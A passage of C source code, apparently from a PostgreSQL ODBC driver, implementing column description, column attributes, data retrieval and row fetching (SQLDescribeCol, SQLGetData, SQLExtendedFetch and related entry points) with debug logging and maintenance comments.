                ptr = strrchr(msg, ' ');
            } else {
                ptr = NULL;
            }
            if (ptr) {
                *pcrow = atoi(ptr+1);
                mylog("**** SQLRowCount(): THE ROWS: *pcrow = %d\n", *pcrow);
            }
            else {
                /* No trailing count token (or no tag at all): count unknown. */
                *pcrow = -1;
                mylog("**** SQLRowCount(): NO ROWS: *pcrow = %d\n", *pcrow);
            }
            return SQL_SUCCESS;
        }
    }

    SC_log_error(func, "Bad return value", stmt);
    return SQL_ERROR;
}
/*
 * SQLNumResultCols - report the number of columns in the statement's result.
 *
 * When driver-side parsing is enabled and the statement is a SELECT, the
 * column count is answered from the driver's own parse of the SQL text
 * (avoiding a backend round trip).  Otherwise the statement is pre-executed
 * and the count is read from the backend result.
 */
RETCODE SQL_API SQLNumResultCols(
        HSTMT hstmt,
        SWORD FAR *pccol)
{
    static char* const func="SQLNumResultCols";
    StatementClass *stmt = (StatementClass *) hstmt;
    QResultClass *result;
    char parse_ok;

    if ( ! stmt) {
        SC_log_error(func, "", NULL);
        return SQL_INVALID_HANDLE;
    }
    SC_clear_error(stmt);

    /* First try to answer from the driver-side parse. */
    parse_ok = FALSE;
    if (globals.parse && stmt->statement_type == STMT_TYPE_SELECT) {
        if (stmt->parse_status == STMT_PARSE_NONE) {
            mylog("SQLNumResultCols: calling parse_statement on stmt=%u\n", stmt);
            parse_statement(stmt);
        }
        if (stmt->parse_status != STMT_PARSE_FATAL) {
            parse_ok = TRUE;
            *pccol = stmt->nfld;
            mylog("PARSE: SQLNumResultCols: *pccol = %d\n", *pccol);
        }
    }

    /* Fall back to (pre-)executing the statement and asking the result. */
    if ( ! parse_ok) {
        SC_pre_execute(stmt);
        result = SC_get_Result(stmt);
        mylog("SQLNumResultCols: result = %u, status = %d, numcols = %d\n", result, stmt->status, result != NULL ? QR_NumResultCols(result) : -1);
        if (( ! result) || ((stmt->status != STMT_FINISHED) && (stmt->status != STMT_PREMATURE)) ) {
            /* no query has been executed on this statement */
            SC_set_error(stmt, STMT_SEQUENCE_ERROR, "No query has been executed with that handle");
            SC_log_error(func, "", stmt);
            return SQL_ERROR;
        }
        *pccol = QR_NumResultCols(result);
    }
    return SQL_SUCCESS;
}
/* - - - - - - - - - */
/*
 * SQLDescribeCol - return name, SQL type, precision, scale and nullability
 * of one result-set column.
 *
 * Like SQLNumResultCols, the answer is taken from the driver-side parse of
 * the statement when possible; otherwise the statement is pre-executed and
 * the metadata is read from the backend result.
 */
RETCODE SQL_API SQLDescribeCol(
        HSTMT hstmt,
        UWORD icol,
        UCHAR FAR *szColName,
        SWORD cbColNameMax,
        SWORD FAR *pcbColName,
        SWORD FAR *pfSqlType,
        SQLULEN FAR *pcbColDef,
        SWORD FAR *pibScale,
        SWORD FAR *pfNullable)
{
    static char* const func="SQLDescribeCol";
    /* gets all the information about a specific column */
    StatementClass *stmt = (StatementClass *) hstmt;
    QResultClass *res;
    char *col_name = NULL;
    Int4 fieldtype = 0;
    int precision = 0;
    ConnInfo *ci;
    char parse_ok;
    char buf[255];
    int len = 0;
    RETCODE result;

    mylog("%s: entering...\n", func);
    if ( ! stmt) {
        SC_log_error(func, "", NULL);
        return SQL_INVALID_HANDLE;
    }
    ci = &(stmt->hdbc->connInfo);
    SC_clear_error(stmt);

    /* Dont check for bookmark column. This is the responsibility
       of the driver manager.
    */
    icol--; /* use zero based column numbers */

    /* Attempt to answer from the driver-side parse of the SELECT. */
    parse_ok = FALSE;
    if (globals.parse && stmt->statement_type == STMT_TYPE_SELECT) {
        if (stmt->parse_status == STMT_PARSE_NONE) {
            mylog("SQLDescribeCol: calling parse_statement on stmt=%u\n", stmt);
            parse_statement(stmt);
        }
        mylog("PARSE: DescribeCol: icol=%d, stmt=%u, stmt->nfld=%d, stmt->fi=%u\n", icol, stmt, stmt->nfld, stmt->fi);
        if (stmt->parse_status != STMT_PARSE_FATAL && stmt->fi && stmt->fi[icol]) {
            if (icol >= stmt->nfld) {
                SC_set_error(stmt, STMT_INVALID_COLUMN_NUMBER_ERROR, "Invalid column number in DescribeCol.");
                SC_log_error(func, "", stmt);
                return SQL_ERROR;
            }
            mylog("DescribeCol: getting info for icol=%d\n", icol);
            fieldtype = stmt->fi[icol]->type;
            col_name = stmt->fi[icol]->name;
            precision = stmt->fi[icol]->precision;
            mylog("PARSE: fieldtype=%d, col_name='%s', precision=%d\n", fieldtype, col_name, precision);
            /* A non-positive type means the parse could not resolve the
               column; fall through to the backend path below. */
            if (fieldtype > 0)
                parse_ok = TRUE;
        }
    }

    /* If couldn't parse it OR the field being described was not parsed (i.e., because
       it was a function or expression, etc, then do it the old fashioned way.
    */
    if ( ! parse_ok) {
        SC_pre_execute(stmt);
        res = SC_get_Result(stmt);
        mylog("**** SQLDescribeCol: res = %u, stmt->status = %d, !finished=%d, !premature=%d\n", res, stmt->status, stmt->status != STMT_FINISHED, stmt->status != STMT_PREMATURE);
        if ( (NULL == res) || ((stmt->status != STMT_FINISHED) && (stmt->status != STMT_PREMATURE))) {
            /* no query has been executed on this statement */
            SC_set_error(stmt, STMT_SEQUENCE_ERROR, "No query has been assigned to this statement.");
            SC_log_error(func, "", stmt);
            return SQL_ERROR;
        }
        if (icol >= QR_NumResultCols(res)) {
            SC_set_error(stmt, STMT_INVALID_COLUMN_NUMBER_ERROR, "Invalid column number in DescribeCol.");
            sprintf(buf, "Col#=%d, #Cols=%d", icol, QR_NumResultCols(res));
            SC_log_error(func, buf, stmt);
            return SQL_ERROR;
        }
        col_name = QR_get_fieldname(res, icol);
        fieldtype = QR_get_field_type(res, icol);
        precision = pgtype_precision(stmt, fieldtype, icol, globals.unknown_sizes); /* atoi(ci->unknown_sizes) */
    }

    mylog("describeCol: col %d fieldname = '%s'\n", icol, col_name);
    mylog("describeCol: col %d fieldtype = %d\n", icol, fieldtype);
    mylog("describeCol: col %d precision = %d\n", icol, precision);

    result = SQL_SUCCESS;

    /************************/
    /*     COLUMN NAME      */
    /************************/
    len = strlen(col_name);
    if (pcbColName)
        *pcbColName = len;
    if (szColName) {
        strncpy_null((char*)szColName, col_name, cbColNameMax);
        /* Name did not fit: report success-with-info per the ODBC contract. */
        if (len >= cbColNameMax) {
            result = SQL_SUCCESS_WITH_INFO;
            SC_set_error(stmt, STMT_TRUNCATED, "The buffer was too small for the result.");
        }
    }

    /************************/
    /*       SQL TYPE       */
    /************************/
    if (pfSqlType) {
        *pfSqlType = pgtype_to_sqltype(stmt, fieldtype);
        mylog("describeCol: col %d *pfSqlType = %d\n", icol, *pfSqlType);
    }

    /************************/
    /*      PRECISION       */
    /************************/
    if (pcbColDef) {
        if ( precision < 0)
            precision = 0; /* "I dont know" */
        *pcbColDef = precision;
        mylog("describeCol: col %d *pcbColDef = %d\n", icol, *pcbColDef);
    }

    /************************/
    /*        SCALE         */
    /************************/
    if (pibScale) {
        Int2 scale;
        scale = pgtype_scale(stmt, fieldtype, icol);
        /* -1 means "not applicable"; ODBC callers expect a concrete value. */
        if(scale == -1) { scale = 0; }
        *pibScale = scale;
        mylog("describeCol: col %d *pibScale = %d\n", icol, *pibScale);
    }

    /************************/
    /*      NULLABILITY     */
    /************************/
    if (pfNullable) {
        *pfNullable = (parse_ok) ? stmt->fi[icol]->nullable : pgtype_nullable(stmt, fieldtype);
        mylog("describeCol: col %d *pfNullable = %d\n", icol, *pfNullable);
    }
    return result;
}
/*
 * SQLColAttributes - return a single descriptor attribute (name, length,
 * precision, nullability, etc.) of one result-set column.
 *
 * String attributes are returned through rgbDesc/pcbDesc, numeric ones
 * through pfDesc.  SQL_COLUMN_COUNT ignores the column number entirely.
 */
SQLRETURN SQLColAttributes(
        SQLHSTMT hstmt,
        SQLUSMALLINT icol,
        SQLUSMALLINT fDescType,
        SQLPOINTER rgbDesc,
        SQLSMALLINT cbDescMax,
        SQLSMALLINT *pcbDesc,
        SQLLEN *pfDesc)
{
    static char* const func = "SQLColAttributes";
    StatementClass *stmt = (StatementClass *) hstmt;
    Int4 field_type = 0;
    ConnInfo *ci;
    int unknown_sizes;
    int cols = 0;
    char parse_ok;
    RETCODE result;
    char *p = NULL;
    int len = 0, value = 0;

    mylog("%s: entering...\n", func);
    if( ! stmt) {
        SC_log_error(func, "", NULL);
        return SQL_INVALID_HANDLE;
    }
    ci = &(stmt->hdbc->connInfo);

    /* Dont check for bookmark column. This is the responsibility
       of the driver manager. For certain types of arguments, the column
       number is ignored anyway, so it may be 0.
    */
    icol--;

    unknown_sizes = globals.unknown_sizes; /* atoi(ci->unknown_sizes); */
    if (unknown_sizes == UNKNOWNS_AS_DONTKNOW) /* not appropriate for SQLColAttributes() */
        unknown_sizes = UNKNOWNS_AS_MAX;

    /* Try to answer from the driver-side parse first (see SQLDescribeCol). */
    parse_ok = FALSE;
    if (globals.parse && stmt->statement_type == STMT_TYPE_SELECT) {
        if (stmt->parse_status == STMT_PARSE_NONE) {
            mylog("SQLColAttributes: calling parse_statement\n");
            parse_statement(stmt);
        }
        cols = stmt->nfld;

        /* Column Count is a special case. The Column number is ignored
           in this case.
        */
        if (fDescType == SQL_COLUMN_COUNT) {
            if (pfDesc)
                *pfDesc = cols;
            return SQL_SUCCESS;
        }
        if (stmt->parse_status != STMT_PARSE_FATAL && stmt->fi && stmt->fi[icol]) {
            if (icol >= cols) {
                SC_set_error(stmt, STMT_INVALID_COLUMN_NUMBER_ERROR, "Invalid column number in DescribeCol.");
                SC_log_error(func, "", stmt);
                return SQL_ERROR;
            }
            field_type = stmt->fi[icol]->type;
            if (field_type > 0)
                parse_ok = TRUE;
        }
    }

    /* Parse unavailable or inconclusive: pre-execute and use the backend. */
    if ( ! parse_ok) {
        SC_pre_execute(stmt);
        mylog("**** SQLColAtt: result = %u, status = %d, numcols = %d\n", stmt->result, stmt->status, stmt->result != NULL ? QR_NumResultCols(stmt->result) : -1);
        if ( (NULL == stmt->result) || ((stmt->status != STMT_FINISHED) && (stmt->status != STMT_PREMATURE)) ) {
            SC_set_error(stmt, STMT_SEQUENCE_ERROR, "Can't get column attributes: no result found.");
            SC_log_error(func, "", stmt);
            return SQL_ERROR;
        }
        cols = QR_NumResultCols(stmt->result);

        /* Column Count is a special case. The Column number is ignored
           in this case.
        */
        if (fDescType == SQL_COLUMN_COUNT) {
            if (pfDesc)
                *pfDesc = cols;
            return SQL_SUCCESS;
        }
        if (icol >= cols) {
            SC_set_error(stmt, STMT_INVALID_COLUMN_NUMBER_ERROR, "Invalid column number in DescribeCol.");
            SC_log_error(func, "", stmt);
            return SQL_ERROR;
        }
        field_type = QR_get_field_type(stmt->result, icol);
    }

    mylog("colAttr: col %d field_type = %d\n", icol, field_type);

    /* Attributes that produce a string set p; numeric ones set value.
       Which of the two was set decides how the answer is returned below. */
    switch(fDescType) {
    case SQL_COLUMN_AUTO_INCREMENT:
        value = pgtype_auto_increment(stmt, field_type);
        if (value == -1)  /* non-numeric becomes FALSE (ODBC Doc) */
            value = FALSE;
        break;
    case SQL_COLUMN_CASE_SENSITIVE:
        value = pgtype_case_sensitive(stmt, field_type);
        break;
    /* This special case is handled above.
    case SQL_COLUMN_COUNT:
    */
    case SQL_COLUMN_DISPLAY_SIZE:
        value = (parse_ok) ? stmt->fi[icol]->display_size : pgtype_display_size(stmt, field_type, icol, unknown_sizes);
        mylog("SQLColAttributes: col %d, display_size= %d\n", icol, value);
        break;
    case SQL_COLUMN_LABEL:
        if (parse_ok && stmt->fi[icol]->alias[0] != '\0') {
            p = stmt->fi[icol]->alias;
            mylog("SQLColAttr: COLUMN_LABEL = '%s'\n", p);
            break;
        }  /* otherwise same as column name -- FALL THROUGH!!! */
    case SQL_COLUMN_NAME:
        p = (parse_ok) ? stmt->fi[icol]->name : QR_get_fieldname(stmt->result, icol);
        mylog("SQLColAttr: COLUMN_NAME = '%s'\n", p);
        break;
    case SQL_COLUMN_LENGTH:
        value = (parse_ok) ? stmt->fi[icol]->length : pgtype_length(stmt, field_type, icol, unknown_sizes);
        mylog("SQLColAttributes: col %d, length = %d\n", icol, value);
        break;
    case SQL_COLUMN_MONEY:
        value = pgtype_money(stmt, field_type);
        break;
    case SQL_COLUMN_NULLABLE:
        value = (parse_ok) ? stmt->fi[icol]->nullable : pgtype_nullable(stmt, field_type);
        break;
    case SQL_COLUMN_OWNER_NAME:
        /* Schema/owner not tracked by this driver; report empty string. */
        p = "";
        break;
    case SQL_COLUMN_PRECISION:
        value = (parse_ok) ? stmt->fi[icol]->precision : pgtype_precision(stmt, field_type, icol, unknown_sizes);
        mylog("SQLColAttributes: col %d, precision = %d\n", icol, value);
        break;
    case SQL_COLUMN_QUALIFIER_NAME:
        p = "";
        break;
    case SQL_COLUMN_SCALE:
        value = pgtype_scale(stmt, field_type, icol);
        break;
    case SQL_COLUMN_SEARCHABLE:
        value = pgtype_searchable(stmt, field_type);
        break;
    case SQL_COLUMN_TABLE_NAME:
        p = (parse_ok && stmt->fi[icol]->ti) ? stmt->fi[icol]->ti->name : "";
        mylog("SQLColAttr: TABLE_NAME = '%s'\n", p);
        break;
    case SQL_COLUMN_TYPE:
        value = pgtype_to_sqltype(stmt, field_type);
        break;
    case SQL_COLUMN_TYPE_NAME:
        p = pgtype_to_name(stmt, field_type);
        break;
    case SQL_COLUMN_UNSIGNED:
        value = pgtype_unsigned(stmt, field_type);
        if(value == -1) /* non-numeric becomes TRUE (ODBC Doc) */
            value = TRUE;
        break;
    case SQL_COLUMN_UPDATABLE:
        /* Neither Access or Borland care about this.
        if (field_type == PG_TYPE_OID)
            *pfDesc = SQL_ATTR_READONLY;
        else
        */
        value = SQL_ATTR_WRITE;
        mylog("SQLColAttr: UPDATEABLE = %d\n", value);
        break;
    }

    result = SQL_SUCCESS;

    if (p) {  /* char/binary data */
        len = strlen(p);
        if (rgbDesc) {
            strncpy_null((char *)rgbDesc, p, (size_t)cbDescMax);
            if (len >= cbDescMax) {
                result = SQL_SUCCESS_WITH_INFO;
                SC_set_error(stmt, STMT_TRUNCATED, "The buffer was too small for the result.");
            }
        }
        if (pcbDesc)
            *pcbDesc = len;
    }
    else {  /* numeric data */
        if (pfDesc)
            *pfDesc = value;
    }

    return result;
}
/*
 * PG_SQLGetData - return the data for a single column of the current row,
 * converting it to the requested C type.
 *
 * Column 0 is the bookmark column (only valid when bookmark usage is
 * enabled).  The raw value is located either in the locally cached result
 * (manual results / no declare-fetch) or in the backend socket cache, then
 * converted via copy_and_convert_field().
 */
RETCODE SQL_API PG_SQLGetData(
        HSTMT hstmt,
        UWORD icol,
        SWORD fCType,
        PTR rgbValue,
        SDWORD cbValueMax,
        SDWORD FAR *pcbValue)
{
    static char* const func="SQLGetData";
    QResultClass *res;
    StatementClass *stmt = (StatementClass *) hstmt;
    int num_cols, num_rows;
    Int4 field_type;
    void *value = NULL;
    int result;
    char get_bookmark = FALSE;

    mylog("SQLGetData: enter, stmt=%u\n", stmt);
    if( ! stmt) {
        SC_log_error(func, "", NULL);
        return SQL_INVALID_HANDLE;
    }
    res = stmt->result;

    if (STMT_EXECUTING == stmt->status) {
        SC_set_error(stmt, STMT_SEQUENCE_ERROR, "Can't get data while statement is still executing.");
        SC_log_error(func, "", stmt);
        return SQL_ERROR;
    }
    if (stmt->status != STMT_FINISHED) {
        SC_set_error(stmt, STMT_STATUS_ERROR, "GetData can only be called after the successful execution on a SQL statement");
        SC_log_error(func, "", stmt);
        return SQL_ERROR;
    }

    if (icol == 0) {
        /* Column 0 is the bookmark column; validate usage and C type. */
        if (stmt->options.use_bookmarks == SQL_UB_OFF) {
            SC_set_error(stmt, STMT_COLNUM_ERROR, "Attempt to retrieve bookmark with bookmark usage disabled");
            SC_log_error(func, "", stmt);
            return SQL_ERROR;
        }
        /* Make sure it is the bookmark data type */
        if (fCType != SQL_C_BOOKMARK && fCType != SQL_C_BINARY ) {
            SC_set_error(stmt, STMT_PROGRAM_TYPE_OUT_OF_RANGE, "Column 0 is not of type SQL_C_BOOKMARK");
            SC_log_error(func, "", stmt);
            return SQL_ERROR;
        }
        get_bookmark = TRUE;
    }
    else {
        /* use zero-based column numbers */
        icol--;
        /* make sure the column number is valid */
        num_cols = QR_NumResultCols(res);
        if (icol >= num_cols) {
            SC_set_error(stmt, STMT_INVALID_COLUMN_NUMBER_ERROR, "Invalid column number.");
            SC_log_error(func, "", stmt);
            return SQL_ERROR;
        }
    }

    if ( stmt->manual_result || ! globals.use_declarefetch) {
        /* The whole result is cached locally: bounds-check the row cursor. */
        /* make sure we're positioned on a valid row */
        num_rows = QR_get_num_tuples(res);
        if((stmt->currTuple < 0) ||
           (stmt->currTuple >= num_rows)) {
            SC_set_error(stmt, STMT_INVALID_CURSOR_STATE_ERROR, "Not positioned on a valid row for GetData.");
            SC_log_error(func, "", stmt);
            return SQL_ERROR;
        }
        mylog("     num_rows = %d\n", num_rows);
        if ( ! get_bookmark) {
            if ( stmt->manual_result) {
                value = QR_get_value_manual(res, stmt->currTuple, icol);
            }
            else {
                value = QR_get_value_backend_row(res, stmt->currTuple, icol);
            }
            mylog("     value = '%s'\n", value);
        }
    }
    else { /* it's a SOCKET result (backend data) */
        if (stmt->currTuple == -1 || ! res || ! res->tupleField) {
            SC_set_error(stmt, STMT_INVALID_CURSOR_STATE_ERROR, "Not positioned on a valid row for GetData.");
            SC_log_error(func, "", stmt);
            return SQL_ERROR;
        }
        if ( ! get_bookmark)
            value = QR_get_value_backend(res, icol);
        /* NOTE(review): in the bookmark case value is still NULL here and is
           passed to mylog's %s — relies on the logger tolerating NULL. */
        mylog("  socket: value = '%s'\n", value);
    }

    if ( get_bookmark) {
        /* Bookmarks are returned directly as a 32-bit row identifier. */
        *((UDWORD *) rgbValue) = SC_get_bookmark(stmt);
        if (pcbValue)
            *pcbValue = 4;
        return SQL_SUCCESS;
    }

    field_type = QR_get_field_type(res, icol);
    mylog("**** SQLGetData: icol = %d, fCType = %d, field_type = %d, value = '%s'\n", icol, fCType, field_type, value);

    /* current_col enables per-column state (e.g. partial reads) during the
       conversion, and is reset afterwards. */
    stmt->current_col = icol;
    result = copy_and_convert_field(stmt, field_type, value,
                                    fCType, rgbValue, cbValueMax, (SQLLEN*)pcbValue);
    stmt->current_col = -1;

    /* Map the converter's status codes onto ODBC return codes. */
    switch(result) {
    case COPY_OK:
        return SQL_SUCCESS;
    case COPY_UNSUPPORTED_TYPE:
        SC_set_error(stmt, STMT_RESTRICTED_DATA_TYPE_ERROR, "Received an unsupported type from Postgres.");
        SC_log_error(func, "", stmt);
        return SQL_ERROR;
    case COPY_UNSUPPORTED_CONVERSION:
        SC_set_error(stmt, STMT_RESTRICTED_DATA_TYPE_ERROR, "Couldn't handle the necessary data type conversion.");
        SC_log_error(func, "", stmt);
        return SQL_ERROR;
    case COPY_RESULT_TRUNCATED:
        SC_set_error(stmt, STMT_TRUNCATED, "The buffer was too small for the result.");
        return SQL_SUCCESS_WITH_INFO;
    case COPY_GENERAL_ERROR: /* error msg already filled in */
        SC_log_error(func, "", stmt);
        return SQL_ERROR;
    case COPY_NO_DATA_FOUND:
        /* SC_log_error(func, "no data found", stmt); */
        return SQL_NO_DATA_FOUND;
    default:
        SC_set_error(stmt, STMT_INTERNAL_ERROR, "Unrecognized return value from copy_and_convert_field.");
        SC_log_error(func, "", stmt);
        return SQL_ERROR;
    }
}
/*
 * SQLGetData - public ODBC entry point; thin adapter over PG_SQLGetData
 * that narrows the SQLLEN length/indicator pointer to the driver's
 * internal SDWORD representation.
 */
SQLRETURN SQLGetData(SQLHSTMT hstmt,
                     SQLUSMALLINT icol, SQLSMALLINT fCType,
                     SQLPOINTER rgbValue, SQLLEN cbValueMax,
                     SQLLEN *pcbValue)
{
    return PG_SQLGetData( hstmt,
                          icol,
                          fCType,
                          rgbValue,
                          cbValueMax,
                          (SDWORD FAR *)pcbValue );
}
/*
 * PG_SQLFetch - fetch the next row into the bound columns.
 *
 * Validates the statement state (result present, not executing, finished,
 * bindings allocated, no bookmark column bound), then advances the cursor
 * by one row via SC_fetch().
 */
RETCODE SQL_API PG_SQLFetch(
        HSTMT hstmt)
{
    static char* const func = "SQLFetch";
    StatementClass *stmt = (StatementClass *) hstmt;
    QResultClass *res;

    /* BUGFIX: validate the handle BEFORE logging; the original logged
     * stmt->result first, dereferencing a possibly NULL handle. */
    if ( ! stmt) {
        SC_log_error(func, "", NULL);
        return SQL_INVALID_HANDLE;
    }
    mylog("SQLFetch: stmt = %u, stmt->result= %u\n", stmt, stmt->result);

    SC_clear_error(stmt);

    if ( ! (res = stmt->result)) {
        SC_set_error(stmt, STMT_SEQUENCE_ERROR, "Null statement result in SQLFetch.");
        SC_log_error(func, "", stmt);
        return SQL_ERROR;
    }

    /* Not allowed to bind a bookmark column when using SQLFetch. */
    if ( stmt->bookmark.buffer) {
        SC_set_error(stmt, STMT_COLNUM_ERROR, "Not allowed to bind a bookmark column when using SQLFetch");
        SC_log_error(func, "", stmt);
        return SQL_ERROR;
    }

    if (stmt->status == STMT_EXECUTING) {
        SC_set_error(stmt, STMT_SEQUENCE_ERROR, "Can't fetch while statement is still executing.");
        SC_log_error(func, "", stmt);
        return SQL_ERROR;
    }
    if (stmt->status != STMT_FINISHED) {
        SC_set_error(stmt, STMT_STATUS_ERROR, "Fetch can only be called after the successful execution on a SQL statement");
        SC_log_error(func, "", stmt);
        return SQL_ERROR;
    }
    if (stmt->bindings == NULL) {
        /* just to avoid a crash if the user insists on calling this */
        /* function even if SQL_ExecDirect has reported an Error */
        SC_set_error(stmt, STMT_SEQUENCE_ERROR, "Bindings were not allocated properly.");
        SC_log_error(func, "", stmt);
        return SQL_ERROR;
    }

    /* SQLFetch always works one row at a time. */
    QR_set_rowset_size(res, 1);
    QR_inc_base(res, stmt->last_fetch_count);

    return SC_fetch(stmt);
}
/* SQLFetch - public ODBC entry point; delegates directly to PG_SQLFetch. */
RETCODE SQL_API SQLFetch(
        HSTMT hstmt)
{
    return PG_SQLFetch( hstmt );
}
/*
 * SQLExtendedFetch - fetch a block of rows (a rowset).
 *
 * Positions rowset_start according to fFetchType/irow, bounds-checks the
 * new position, then fetches up to rowset_size rows into the bound arrays,
 * recording per-row status in rgfRowStatus and the row count in pcrow.
 * With declare/fetch only SQL_FETCH_NEXT is supported.
 */
SQLRETURN SQLExtendedFetch(
        SQLHSTMT hstmt,
        SQLUSMALLINT fFetchType,
        SQLLEN irow,
        SQLULEN *pcrow,
        SQLUSMALLINT *rgfRowStatus)
{
    static char* const func = "SQLExtendedFetch";
    StatementClass *stmt = (StatementClass *) hstmt;
    QResultClass *res;
    int num_tuples, i, save_rowset_size;
    RETCODE result;
    char truncated, error;

    mylog("SQLExtendedFetch: stmt=%u\n", stmt);
    if ( ! stmt) {
        SC_log_error(func, "", NULL);
        return SQL_INVALID_HANDLE;
    }

    /* Declare/fetch streams rows forward-only from the backend. */
    if ( globals.use_declarefetch && ! stmt->manual_result) {
        if ( fFetchType != SQL_FETCH_NEXT) {
            SC_set_error(stmt, STMT_NOT_IMPLEMENTED_ERROR, "Unsupported fetch type for SQLExtendedFetch with UseDeclareFetch option.");
            return SQL_ERROR;
        }
    }

    SC_clear_error(stmt);

    if ( ! (res = stmt->result)) {
        SC_set_error(stmt, STMT_SEQUENCE_ERROR, "Null statement result in SQLExtendedFetch.");
        SC_log_error(func, "", stmt);
        return SQL_ERROR;
    }

    /* If a bookmark colunmn is bound but bookmark usage is off, then error */
    if (stmt->bookmark.buffer && stmt->options.use_bookmarks == SQL_UB_OFF) {
        SC_set_error(stmt, STMT_COLNUM_ERROR, "Attempt to retrieve bookmark with bookmark usage disabled");
        SC_log_error(func, "", stmt);
        return SQL_ERROR;
    }

    if (stmt->status == STMT_EXECUTING) {
        SC_set_error(stmt, STMT_SEQUENCE_ERROR, "Can't fetch while statement is still executing.");
        SC_log_error(func, "", stmt);
        return SQL_ERROR;
    }
    if (stmt->status != STMT_FINISHED) {
        SC_set_error(stmt, STMT_STATUS_ERROR, "ExtendedFetch can only be called after the successful execution on a SQL statement");
        SC_log_error(func, "", stmt);
        return SQL_ERROR;
    }
    if (stmt->bindings == NULL) {
        /* just to avoid a crash if the user insists on calling this */
        /* function even if SQL_ExecDirect has reported an Error */
        SC_set_error(stmt, STMT_SEQUENCE_ERROR, "Bindings were not allocated properly.");
        SC_log_error(func, "", stmt);
        return SQL_ERROR;
    }

    /* Initialize to no rows fetched */
    if (rgfRowStatus)
        for (i = 0; i < stmt->options.rowset_size; i++)
            *(rgfRowStatus + i) = SQL_ROW_NOROW;
    if (pcrow)
        *pcrow = 0;

    num_tuples = QR_get_num_tuples(res);

    /* Save and discard the saved rowset size */
    save_rowset_size = stmt->save_rowset_size;
    stmt->save_rowset_size = -1;

    /* Compute the new rowset_start for the requested fetch direction. */
    switch (fFetchType)  {
    case SQL_FETCH_NEXT:
        /* From the odbc spec... If positioned before the start of the RESULT SET,
           then this should be equivalent to SQL_FETCH_FIRST.
        */
        if (stmt->rowset_start < 0)
            stmt->rowset_start = 0;
        else {
            stmt->rowset_start += (save_rowset_size > 0 ? save_rowset_size : stmt->options.rowset_size);
        }
        mylog("SQL_FETCH_NEXT: num_tuples=%d, currtuple=%d\n", num_tuples, stmt->currTuple);
        break;
    case SQL_FETCH_PRIOR:
        mylog("SQL_FETCH_PRIOR: num_tuples=%d, currtuple=%d\n", num_tuples, stmt->currTuple);
        /* From the odbc spec... If positioned after the end of the RESULT SET,
           then this should be equivalent to SQL_FETCH_LAST.
        */
        if (stmt->rowset_start >= num_tuples) {
            stmt->rowset_start = num_tuples <= 0 ? 0 : (num_tuples - stmt->options.rowset_size);
        }
        else {
            stmt->rowset_start -= stmt->options.rowset_size;
        }
        break;
    case SQL_FETCH_FIRST:
        mylog("SQL_FETCH_FIRST: num_tuples=%d, currtuple=%d\n", num_tuples, stmt->currTuple);
        stmt->rowset_start = 0;
        break;
    case SQL_FETCH_LAST:
        mylog("SQL_FETCH_LAST: num_tuples=%d, currtuple=%d\n", num_tuples, stmt->currTuple);
        stmt->rowset_start = num_tuples <= 0 ? 0 : (num_tuples - stmt->options.rowset_size) ;
        break;
    case SQL_FETCH_ABSOLUTE:
        mylog("SQL_FETCH_ABSOLUTE: num_tuples=%d, currtuple=%d, irow=%d\n", num_tuples, stmt->currTuple, irow);
        /* Position before result set, but dont fetch anything */
        if (irow == 0) {
            stmt->rowset_start = -1;
            stmt->currTuple = -1;
            return SQL_NO_DATA_FOUND;
        }
        /* Position before the desired row */
        else if (irow > 0) {
            stmt->rowset_start = irow - 1;
        }
        /* Position with respect to the end of the result set */
        else {
            stmt->rowset_start = num_tuples + irow;
        }
        break;
    case SQL_FETCH_RELATIVE:
        /* Refresh the current rowset -- not currently implemented, but lie anyway */
        if (irow == 0) {
            break;
        }
        stmt->rowset_start += irow;
        break;
    case SQL_FETCH_BOOKMARK:
        /* Bookmarks are 1-based row numbers in this driver. */
        stmt->rowset_start = irow - 1;
        break;
    default:
        SC_log_error(func, "Unsupported SQLExtendedFetch Direction", stmt);
        return SQL_ERROR;
    }

    /***********************************/
    /*    CHECK FOR PROPER CURSOR STATE  */
    /***********************************/
    /* Handle Declare Fetch style specially because the end is not really the end... */
    if ( globals.use_declarefetch && ! stmt->manual_result) {
        if (QR_end_tuples(res)) {
            return SQL_NO_DATA_FOUND;
        }
    }
    else {
        /* If *new* rowset is after the result_set, return no data found */
        if (stmt->rowset_start >= num_tuples) {
            stmt->rowset_start = num_tuples;
            return SQL_NO_DATA_FOUND;
        }
    }

    /* If *new* rowset is prior to result_set, return no data found */
    if (stmt->rowset_start < 0) {
        if (stmt->rowset_start + stmt->options.rowset_size <= 0) {
            stmt->rowset_start = -1;
            return SQL_NO_DATA_FOUND;
        }
        else { /* overlap with beginning of result set, so get first rowset */
            stmt->rowset_start = 0;
        }
    }

    /* currTuple is always 1 row prior to the rowset */
    stmt->currTuple = stmt->rowset_start - 1;

    /* increment the base row in the tuple cache */
    QR_set_rowset_size(res, stmt->options.rowset_size);
    QR_inc_base(res, stmt->last_fetch_count);

    /* Physical Row advancement occurs for each row fetched below */
    mylog("SQLExtendedFetch: new currTuple = %d\n", stmt->currTuple);

    /* Fetch rows one at a time; SC_fetch writes through the row bindings
       at the index selected by bind_row. */
    truncated = error = FALSE;
    for (i = 0; i < stmt->options.rowset_size; i++) {
        stmt->bind_row = i; /* set the binding location */
        result = SC_fetch(stmt);

        /* Determine Function status */
        if (result == SQL_NO_DATA_FOUND)
            break;
        else if (result == SQL_SUCCESS_WITH_INFO)
            truncated = TRUE;
        else if (result == SQL_ERROR)
            error = TRUE;

        /* Determine Row Status */
        if (rgfRowStatus) {
            if (result == SQL_ERROR)
                *(rgfRowStatus + i) = SQL_ROW_ERROR;
            else
                *(rgfRowStatus + i)= SQL_ROW_SUCCESS;
        }
    }

    /* Save the fetch count for SQLSetPos */
    stmt->last_fetch_count= i;

    /* Reset next binding row */
    stmt->bind_row = 0;

    /* Move the cursor position to the first row in the result set. */
    stmt->currTuple = stmt->rowset_start;

    /* For declare/fetch, need to reset cursor to beginning of rowset */
    if (globals.use_declarefetch && ! stmt->manual_result) {
        QR_set_position(res, 0);
    }

    /* Set the number of rows retrieved */
    if (pcrow)
        *pcrow = i;

    if (i == 0)
        return SQL_NO_DATA_FOUND; /* Only DeclareFetch should wind up here */
    else if (error)
        return SQL_ERROR;
    else if (truncated)
        return SQL_SUCCESS_WITH_INFO;
    else
        return SQL_SUCCESS;
}
/* This determines whether there are more results sets available for */
/* the "hstmt". */
/* CC: return SQL_NO_DATA_FOUND since we do not support multiple result sets */
RETCODE SQL_API SQLMoreResults(
        HSTMT hstmt)
{
    /* The driver never produces multiple result sets, so there is never
       another result to advance to. */
    return SQL_NO_DATA_FOUND;
}
/*
 * SQLSetPos - position the cursor on a row within the current rowset that
